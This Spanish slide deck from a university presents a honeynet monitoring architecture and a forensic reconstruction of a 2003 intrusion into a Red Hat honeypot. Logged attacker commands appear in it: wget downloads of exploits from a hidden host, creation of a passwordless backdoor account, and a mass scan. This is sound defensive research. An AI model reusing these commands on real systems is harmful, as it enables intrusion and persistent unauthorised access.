EVO-HADES: Arquitectura para la monitorización y análisis forense

Jesús Damián Jiménez Re <jdjimenez@dif.um.es>Universidad de Murcia

2 / 30

Contenido

1. Objetivos2. Infraestructura de red3. Monitorización de procesos4. Análisis de una Intrusión5. Conclusiones

3 / 30

Contenido

1. Objetivos2. Infraestructura de red3. Monitorización de procesos4. Análisis de una Intrusión5. Conclusiones

4 / 30

1. Objetivos

Ámbito de actuación: Evolución del sistema HADES Proyecto fin de carrera desarrollado

en la Universidad de Murcia En colaboración con el proyecto de

máquinas trampa de RedIRIS

5 / 30

1. Objetivos Objetivo:

Diseño de una arquitectura de red que permita:

FASE 1Diseño Infraestructura de red

(Hardware / Software)

FASE 2Diseño herramientas

monitorización

Modificaciones a nivel S.O:- Módulo control

- Modificación del syslogd

FASE 3Análisis de unaintrusión real

- Máquina de análisis- Descripción de nuevas

herramientas

SISTEMA HoneyNET conequipo trampa

-Paquete de Instalación- Utilidades deconfiguración

1. Descubrirvulnerabilidades

3. Obtener informaciónde las máquinas

2. Facilitar puesta enmarcha

4. Análisis Forense

6 / 30

Contenido

1. Objetivos

2. Infraestructura de red3. Monitorización de procesos4. Análisis de una Intrusión5. Conclusiones

7 / 30

2. Infraestructura de redBasada en los sistemas HoneyNET

Separación entre:• Subred de control• Subred trampa• Subred corporativa

Máquina de control:• Conectada

físicamente a la subred trampa, pero sin interfaz de red en ella

• Modo puente• Activado filtrado

paquetes (firewall)

Com3

Hub

Com3

Switch

Máquina Trampa

Máquina Trampa

Subred de control

Subred “física”máquinas trampa

INTERNET

Puente

Subred Corporativa

Máquina control

Com3

Switch

Servidor Web

Servidor Correo

Firewall

Máquina Análisis

Adm. Máquina control

Com3

Switch

3Com

Router

8 / 30

2. Infraestructura de red

Máquina de control Paquete RPM para la instalación del modo puente +

firewall Configuración del filtrado/captura de equipos trampa

mediante ficheros de configuración:# Ejemplo de fichero de configuración de PED-CONTROL

# Maquinas cuyo tráfico se desea capturar:155.54.XX.YY captura

# Maquinas cuyo tráfico se desea filtrar:155.54.ZZ.TT filtra

Inicio y parada del puente+firewall con comandos start/stop. Comprobación periódica del tamaño de los ficheros de captura

Envío de e-mail de alerta Filtrado de tráfico para evitar ataques al exterior

9 / 30

2. Infraestructura de red Máquinas trampa

Se han habilitado los servicios habituales en una organización:

FTP telnet SSH Servidor Web Proxy …

10 / 30

Contenido

1. Objetivos2. Infraestructura de red

3. Monitorización de procesos

4. Análisis de una Intrusión5. Conclusiones

11 / 30

3. Monitorización de procesos Existen ocasiones en las que están

implicadas conexiones encriptadas entre el equipo trampa y el atacante

Ejemplo: El atacante instala una versión modificada del servidor OpenSSH (sshd).

Máquina TrampaINTERNET

Máquina Control

Com3

Hub

Tráfico cifrado (SSH)

AtacanteTráfico capturado ..¿?

No es posible la visualización mediante el análisis del tráfico de la red

12 / 30

3. Monitorización de procesos Solución: Modificaciones a nivel del sistema

operativo para el envío remoto de: Procesos/comandos ejecutados

Implantación de un módulo a nivel del kernel de Linux que envía información a la máquina de control

Com3

Hub

Máquina Trampa

Máquina control

Información comandos ejecutados

13 / 30

3. Monitorización de procesos

Módulo para la monitorización Técnica

Se interceptan las llamadas al sistema provocadas por los procesos

Se ejecuta el código original, más: El nuevo código, que en nuestro

caso envía una trama UDP con el proceso ejecutado

El tráfico generado por el módulo será capturado por la máquina de control, junto al resto del tráfico de la máquina

ESPACIO USUARIO

kernel de LINUX

Llamadas alsistema

Módulo decontrol

sys_*()

Programas

14 / 30

Contenido

1. Objetivos2. Infraestructura de red3. Monitorización de procesos

4. Análisis de una Intrusión5. Conclusiones

15 / 30

4. Análisis de una intrusión Objetivos del análisis

Detectar nuevos patrones de ataque y las herramientas utilizadas para ello

Obtener pruebas que justifiquen posibles acciones legales sobre el atacante

Estudio de nuevas herramientas The Sleuth Kit y Autopsy Forensic Browser

16 / 30

4. Análisis de una intrusión Metodología:

Se utiliza la suma de 3 técnicas:

AnálisisForense

Análisis deltráfico de

red

Análisis deprocesos

ANÁLISIS DE UNA INTRUSIÓN

Información suministradapor el módulo de control

Capturado por la máquinade controlImágenes del disco duro

Toda esta información (imágenes + capturas) es pasada a la máquina de análisis para su estudio

17 / 30

4. Análisis de una intrusión Descripción de la máquina atacada

Nombre (ficticio): ped.um.es Linux Red Hat 7.2 Puesta en red: 29 de Mayo de 2003. Se descubre que ha sido atacada el

día 31 de Mayo del 2003. Se “permite” el acceso monitorizado

a la máquina durante 11 días (hasta el día 10 de Junio de 2003).

18 / 30

4. Análisis de una intrusión

Máquina TrampaINTERNET

Máquina Control

Com3

Hub

Máquina Adm. control

Organización

Tráfico HTTPS

e-mail alerta

Atacante

1. ATAQUE Y ENTRADA AL SISTEMA

Se detecta un aumento del tráfico HTTPS

Se recibe un correo electrónico de alerta

From: ZZ@control.um.esTo: TT@um.esSubject: aumento de 543 K en el trafico de 155.54.XX.YY---------A las 20:15:00 el equipo de control control.um.esha detectado un aumento de 543 K en el tráfico conorigen o destino la máquina PED 155.54.XX.YY

1. ENTRADA AL SISTEMA

2. INSTALACIÓN DE ROOTKIT’s

3. SEGUNDO ATAQUE ALEQUIPO

4. INSTALACION DE UNBOUNCER

5. HACIENDO SUYO ELSISTEMA

6. SESIONES DE IRC

7. ATAQUE A OTRASMÁQUINAS

19 / 30

4. Análisis de una intrusión Análisis de tráfico

Se ha aprovechado una vulnerabilidad en la llave del protocolo OpenSSL y el servidor Apache.

Esto permite iniciar un shell con permisos de Apache.

En las conexiones posteriores al tráfico HTTPS, se descubre la descarga de diversos ficheros binarios

Análisis forense: Se analizan los ficheros descargados:

Exploit pt: Abre un shell con privilegios de root. Se aprovecha de una vulnerabilidad de los kernel 2.4.X en la llamada al sistema ptrace (buffer overflow).

1. ENTRADA AL SISTEMA

2. INSTALACIÓN DE ROOTKIT’s

3. SEGUNDO ATAQUE ALEQUIPO

4. INSTALACION DE UNBOUNCER

5. HACIENDO SUYO ELSISTEMA

6. SESIONES DE IRC

7. ATAQUE A OTRASMÁQUINAS

20 / 30

4. Análisis de una intrusión

Máquina TrampaINTERNET

Máquina Control

Com3

Hub

Máquina Adm. control

Organización

Máquina controlada remotamente

Atacante

2. INSTALACIÓN DE ROOTKIT’s

Servidor web remoto

- SuckIT - Pandora

Análisis del tráfico: Instalación del rootkit SuckIT en el directorio “/usr/lib/…”:

Sat May 31 2003 20:08:01 4096 .a. d/drwxr-xr-x root/user root 145543 /usr/lib/… 65928 ..c -/-rw-r—r-- root/user root 145544 /usr/lib/…/sk.tgz

SuckIT basa su funcionamiento en módulo del núcleo: Oculta PID’s, ficheros, conexiones tcp/udp/socket raw. Integra un shell TTY para el acceso remoto.

1. ENTRADA AL SISTEMA

2. INSTALACIÓN DE ROOTKIT’s

3. SEGUNDO ATAQUE ALEQUIPO

4. INSTALACION DE UNBOUNCER

5. HACIENDO SUYO ELSISTEMA

6. SESIONES DE IRC

7. ATAQUE A OTRASMÁQUINAS

21 / 30

4. Análisis de una intrusión1. ENTRADA AL SISTEMA

2. INSTALACIÓN DE ROOTKIT’s

3. SEGUNDO ATAQUE ALEQUIPO

4. INSTALACION DE UNBOUNCER

5. HACIENDO SUYO ELSISTEMA

6. SESIONES DE IRC

7. ATAQUE A OTRASMÁQUINAS

INTERNET Máquina Trampa

Máquina Control

Com3

Hub

Máquina Adm. control

Organización

fichero /tmp/httpd

Atacante

3. SEGUNDO ATAQUE AL SISTEMA

No se registra actividad en la máquina hasta el día 3 de Junio Análisis de tráfico:

Se sube mediante el servidor web el fichero /tmp/httpd y se ejecuta:

Tue Jun 03 2003 21:16:44 21182 ..c -/-rwxr-xr-x apache apache 62724 /tmp/httpd 21182 .a. -/-rwxr-xr-x apache apache 62724 /tmp/httpd

.

22 / 30

4. Análisis de una intrusión1. ENTRADA AL SISTEMA

2. INSTALACIÓN DE ROOTKIT’s

3. SEGUNDO ATAQUE ALEQUIPO

4. INSTALACION DE UNBOUNCER

5. HACIENDO SUYO ELSISTEMA

6. SESIONES DE IRC

7. ATAQUE A OTRASMÁQUINAS

Análisis forense: /tmp/httpd crea un terminal para la ejecución de

comandos, con UID de Apache (48). Análisis de procesos (módulo):

Para hacerse con permisos de root, el atacante vuelve a descargar el exploit utilizado para el primer ataque (con otro nombre diferente):

21:17:50-2003/06/03 [48:sh:26217:ttyp] cd /tmp

21:18:37-2003/06/03 [48:sh:26217:ttyp] wget direccIPoculta/ozn/abc/prt

21:19:25-2003/06/03 [48:sh:26217:ttyp] chmod +x prt

21:19:27-2003/06/03 [48:sh:26217:ttyp] ./prt

Para asegurarse una entrada posterior al sistema: 21:19:34-2003/06/03 [0:sh:26223:ttyp] /usr/sbin/useradd pwd 21:20:09-2003/06/03 [0:sh:26223:ttyp] passwd –d pwd

23 / 30

4. Análisis de una intrusión1. ENTRADA AL SISTEMA

2. INSTALACIÓN DE ROOTKIT’s

3. SEGUNDO ATAQUE ALEQUIPO

4. INSTALACION DE UNBOUNCER

5. HACIENDO SUYO ELSISTEMA

6. SESIONES DE IRC

7. ATAQUE A OTRASMÁQUINAS

Máquina TrampaINTERNET

Máquina Control

Com3

Hub

Máquina Adm. control

Organización

Máquina controlada remotamente

Atacante

4. INSTALACIÓN DE UN PROXY IRC (BOUNCER)

Servidor web remoto

- psyBNC

El atacante instala utilidades para aprovechar la máquina atacada Análisis forense:

Se instala un proxy IRC llamado psyBNC: Permite ocultar la IP real a los usuarios del proxy. Mantiene la conexión a IRC aunque se desconecte el cliente

24 / 30

4. Análisis de una intrusión1. ENTRADA AL SISTEMA

2. INSTALACIÓN DE ROOTKIT’s

3. SEGUNDO ATAQUE ALEQUIPO

4. INSTALACION DE UNBOUNCER

5. HACIENDO SUYO ELSISTEMA

6. SESIONES DE IRC

7. ATAQUE A OTRASMÁQUINAS

Máquina TrampaINTERNET

Máquina Control

Com3

Hub

Máquina Adm. control

Organización

Máquina controlada remotamente

Atacante

5. HACIENDO “SUYO” EL SISTEMA

Servidor web remoto

- sslSTOP.tgz

El atacante quiere evitar que otros “atacantes” aprovechen la vulnerabilidad que él ha aprovechado para entrar al sistema

Análisis forense: Se instala el paquete sslstop.tgz, que contiene dos script:

sslstop: Detiene el soporte SSL para Apache sslport: Cambia el puerto SSL por defecto de la máquina

25 / 30

4. Análisis de una intrusión1. ENTRADA AL SISTEMA

2. INSTALACIÓN DE ROOTKIT’s

3. SEGUNDO ATAQUE ALEQUIPO

4. INSTALACION DE UNBOUNCER

5. HACIENDO SUYO ELSISTEMA

6. SESIONES DE IRC

7. ATAQUE A OTRASMÁQUINAS

Máquina TrampaINTERNET

Máquina Control

Com3

Hub

Máquina Adm. control

Organización

Máquina controlada remotamente

Atacante

6. SESIONES DE IRC

red IRC: undernet.org

Conexión a las redes IRC en modo proxy

Desde el día 3 de Junio hasta el día 6 de Junio: Conexiones de IRC Las conversaciones han quedado registradas en el tráfico

capturado de la máquina atacada Se han reconstruido algunas con ethereal.

26 / 30

4. Análisis de una intrusión1. ENTRADA AL SISTEMA

2. INSTALACIÓN DE ROOTKIT’s

3. SEGUNDO ATAQUE ALEQUIPO

4. INSTALACION DE UNBOUNCER

5. HACIENDO SUYO ELSISTEMA

6. SESIONES DE IRC

7. ATAQUE A OTRASMÁQUINAS

Máquina TrampaINTERNET

Máquina Control

Com3

Hub

Máquina Adm. control

Organización

Máquina controlada remotamente

Atacante

7. INTENTO DE ATAQUE A OTRAS MÁQUINAS

Subredes víctimas(se busca el fallo en OpenSSL)

mass (scanner)

Tras mantener la máquina comprometida con éxito 7 días, el atacante considera la máquina “fiable”:

Instalación de herramientas para utilizar esta máquina como puente para el ataque a otras:

Se instala el exploit con el que se atacó a esta máquina (openssl-too-open). Scanner de puertos

27 / 30

4. Análisis de una intrusión1. ENTRADA AL SISTEMA

2. INSTALACIÓN DE ROOTKIT’s

3. SEGUNDO ATAQUE ALEQUIPO

4. INSTALACION DE UNBOUNCER

5. HACIENDO SUYO ELSISTEMA

6. SESIONES DE IRC

7. ATAQUE A OTRASMÁQUINAS

Análisis de la información del módulo: Descarga del exploit openssl-too-open

(http.tgz). 03:52:31-2003/06/06 [0:bash:4064:pts] cd /etc 03:52:33-2003/06/06 [0:bash:4064:pts] mkdir .” “ 03:52:34-2003/06/06 [0:bash:4064:pts] cd .” “ 03:52:51-2003/06/06 [0:bash:4064:pts] wget

dirIPoculta/valisie/http.tgz

Descarga y ejecución del scanner mass 11:58:08-2003/06/06 [0:bash:4713:pts] wget

dirIPoculta/valisie/mass.tgz 11:58:17-2003/06/06 [0:bash:4713:pts] tar xvzf mass.tgz 11:58:20-2003/06/06 [0:bash:4713:pts] cd mass 11:58:22-2003/06/06 [0:bash:4713:pts] ./mass –b 67.0.*.* -s 800

Los filtros aplicados en la máquina de control hacen que estos escaneos no tengan éxito.

28 / 30

4. Análisis de una intrusión1. ENTRADA AL SISTEMA

2. INSTALACIÓN DE ROOTKIT’s

3. SEGUNDO ATAQUE ALEQUIPO

4. INSTALACION DE UNBOUNCER

5. HACIENDO SUYO ELSISTEMA

6. SESIONES DE IRC

7. ATAQUE A OTRASMÁQUINAS

Máquina TrampaINTERNET

Máquina Control

Com3

Hub

Máquina Adm. control

Organización

Atacante

DESCONEXIÓN DE LA MÁQUINAMáquina controlada remotamente

El día 10 de Junio se decide que ya se ha obtenido suficiente información del atacante.

Se aplican el filtrado total a través de la máquina de control. Se apaga la máquina y se desconecta de la red.

29 / 30

Contenido

1. Objetivos2. Infraestructura de red3. Monitorización de procesos4. Análisis de una Intrusión

5. Conclusiones

30 / 30

5. Conclusiones Se permite la detección de nuevos tipos y

herramientas de ataque sin poner en riesgo los equipos actuales de la organización

Con la monitorización de procesos remota: Es fácil ver lo que está sucediendo en la máquina

atacada sin tener que cortar la conexión Se obtiene información que no sería posible con las

otras técnicas Complementa al análisis forense y análisis del tráfico

Vías futuras: Migración de la arquitectura para dar soporte a IPv6 Portar el módulo a otros sistemas operativos Desarrollo de un sistema de aviso de ataques